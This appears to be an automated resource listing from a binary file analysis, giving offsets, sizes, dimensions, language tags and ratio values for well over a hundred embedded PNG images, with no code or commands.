                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c35100x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c29200xbeaPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036065573770492
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3beda80x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c11e80x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c0e180x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c01600xcb2PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033846153846153
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c3c280x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c5f980x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c5bd80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c4fd80xbffPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035818951481603
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ba1600x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bc4500x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bc0f80x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bb5000xbf8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035900783289817
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b74980x1e3PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0227743271221532
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b76800x3d2PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112474437627812
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b7b300x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b9df80x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b9a800x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b8ee00xb9aPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037037037037038
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b7a580xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c63000x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c86f80x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c83000x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c76980xc62PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034700315457412
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bc7d00x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bea300x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3be6f00x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bdb680xb84PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003392130257802
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b5e900xb1PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0169491525423728
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a21e80x1daPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232067510548524
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a1e700x375PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124293785310734
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b16000x1a5PNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0261282660332542
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b17a80x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b1b680x11aPNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0283687943262412
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b15980x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b49e80xe0PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03125
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b4de80xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b4ac80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b4d500x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b40600x985PNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00451374640952
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b36900x9caPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00438946528332
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b33500x339PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0133333333333334
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c2c00x214PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0206766917293233
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c4d80x22ePNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0197132616487454
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c7a00xb3PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.011173184357542
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c7080x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9932885906040269
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c8580x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39cc700x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d0880x1fbPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0216962524654833
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d2880x179PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159151193633953
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d5d00x179PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0053050397877985
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d7500x114PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0289855072463767
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d4080x10ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011111111111111
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d5180xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0054945054945055
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d8680x17ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39d9e80x15cPNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0201149425287357
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39f5a00xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a05100x143PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0340557275541795
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39f2280x110PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39f1a00x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39eb000x13bPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0253968253968253
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39e6580x4a1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009282700421941
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d07080x25ePNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018151815181518
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d04f00x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cd4880x167PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9972144846796658
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cd7100x278PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174050632911393
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cd5f00x11aPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9680851063829787
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d00300xd4PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0235849056603774
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cf1780x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cf5080x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cf8200x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cf7700xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cf9400x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cef680x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d03f80xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d19c00xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d18700x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d01080xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d01b80x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d02480x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d02e00x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d03780x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e78400xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e77800xbdPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0105820105820107
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e27800xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d9d600x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3dbb480x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3dbd080x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e73100x46cPNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0097173144876326
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e36100xafPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171428571428571
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e06900x701PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0061349693251533
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e0d980x498PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0093537414965987
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e1c780x5c1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074677528852682
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e22400x539PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082273747195214
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e12300x5c7PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074374577417173
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e17f80x47fPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009556907037359
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d39a80x585PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077848549186128
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d44180x546PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081481481481482
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d3f300x4e1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0088070456365092
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d49600x5b0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007554945054945
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d7fd80x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d81900xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d82800x1ad9PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0016004655899897
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3dcb100xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3dd6580x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ddc680x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3df5180x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d59e80x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d4f100xad3PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039696860339227
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e79900xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e85580xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e43680x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e3dd00x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e37d80x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e33e80x228PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019927536231884
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e49480x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3dc2480x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3dc5d80x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d1a680x32fPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0134969325153373
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d1d980xef8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950417536534447
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d2c900x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f52f00x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f7cb00x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f79180x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f66b80x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f24d80x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f4f800x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f4bb00x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f38900x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f80300x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3faa180x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fa6580x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f93e00x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ecbe80x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ef5680x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ef2100x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3edf880x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e91880x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e9b280x2e6PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148247978436657
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e9ee80x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ec8800x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ec5080x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3eb2980x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e9e100xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fad800x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fd8180x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fd4200x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fc1180x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ef8e80x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f21600x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f1e200x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f0c800x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e78e80xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d30080x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d2d100x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e31f00x17ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e33700x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e36c00x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e31880x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e64d80xd7PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232558139534884
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e68d00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e65b00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e68380x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e5b680x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e51c80x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e4ed00x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cd9880x1d3PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019271948608137
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cdb600x1f8PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0138888888888888
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cddf00x67PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States0.9514563106796117
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cdd580x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cde580x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce1f80x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce5980x1c1PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024498886414254
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce7600x153PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0324483775811208
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cea780x15fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113960113960114
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cebd80x100PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03515625
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce8b80x108PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018939393939394
